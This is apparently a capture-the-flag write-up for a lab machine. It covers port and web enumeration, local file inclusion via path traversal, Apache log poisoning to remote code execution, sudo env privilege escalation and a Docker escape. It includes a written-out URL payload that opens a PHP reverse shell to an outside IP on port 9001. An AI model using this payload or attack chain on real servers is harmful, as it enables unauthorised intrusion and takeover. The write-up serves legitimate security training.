Port enumeration

nmap -p- --open -vvv -n -Pn -sS --min-rate 5000 10.130.187.87 -oG AllPorts.txt

nmap -p22,80 -sCV --min-rate 5000 10.130.187.87

Using nmap I found just 2 services, ssh and http. c12403dabf1379ea2f8903445b557945.png

Web enumeration

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt -e .php,.txt -u http://10.130.187.87/FUZZ

bc9a6825f2772b37b4c88e97511c24a2.png Using ffuf I found a Interesting PHP file. This file is empty, so, I continue exploring the other files. e41b701a632f56e91d4c3057c8ec9071.png Testing the page, I found that this page opens a php file who you can specify in a GET, but it has a filter who stop any route without a dog or a cat. 8f13eafce162ead007f8628980fb1f46.png So, I forced an error in the page, and with this, I obtained the local route to the web dir. d12b780154a9628314be4954af9ad160.png With this, Im able to open the flag.php file using path traversal. 53e82d923996b1888264123f8c3cfa63.png And now, I can use php filters to get the code and get the first flag. 234d59399ac61869bb3de15a28b5b6c4.png a164650738f096dffeee7fbb01bb27a6.png Now, Using and hex null encode, Im able to bypass the .php filter. bbf511fe2402aa703872f936a62c3c23.png But it doesn't work. Reading the Index.php code, I found another valid get argument in the page. c8481dc816862150d106437b2d403ed3.png So, I used It to bypass the .php filter. 38748e70eb1c391e65b334721ebd69d5.png Using this same vuln, I found an log poisoning vuln. b094c17c47fd116835240242960a0832.png

NOTE
Due to the FFUF scan, I was forced to reset the machine.

Log poisoning RCE

Using this vulnerability, I inyect a php shell into the flog. c927033ef1928ea5f4544deddb9d6dc1.png With this, Im able to execute code. fbd4414ec13d185dfa8282140d9383ad.png And execute a reverse shell.

/?view=dog/../../../../../../../var/log/apache2/access.log&cmd=php+-r+'$sock%3dfsockopen("192.168.138.103",9001)%3bpassthru("sh+<%263+>%263+2>%263")%3b'&ext=

d74fa0e30673ac12abb9c328a06cbc25.png With this, I found the second flag. 807009e0d4a3a2de5c7ba59f981f3910.png

Privilege escalation

Using sudo -l I found who the user can use the command env as sudo. cfc69e1726fba96d9cb76bfdc843600f.png So, with this, im able to create a root shell. 41638df17ed20739a5b83dde0bf1a641.png As root, I can read the third flag. ab94500a99e503dff160aec2c948e973.png Now, as root, I read a backup script and a backup in a tar. 8ef45a7013c8d36915d5063aafddfb57.png This script creates a tar with the content of a directory called container, who didn't exist rigth now, but, the tar is here, so, lets see it. 47d51157ace2db8715690a4aba10f769.png This looks like a docker hosting the web page who we saw the last time. 075b6d83f85eb377e4326df2005ee11d.png Here, I found a .git file. 2eb222af9c50adec8eec3844d3ad7573.png TO read this logs, I need a machine with git, so, I copied the backup in the web dir and obtined it in my own machine. 6e4b3416c98e642eef7d029f85c72e0d.png 24fa707c1f0cdec4afcdcf4091662c1d.png Now, using git, I listed all the logs, but I found nothing. After this, I realised who we are in a docker env all this time. 0d59fbfeb2e5b17a32f9144d12cfe10a.png

Docker escape.

I just need to write a reverse shell in the script. 094b8adcef842bb7613e9cf103f555fa.png With this, I obtained a root flag in the machine and read the last flag. b0197a76ead56b2beb175403c305cc27.png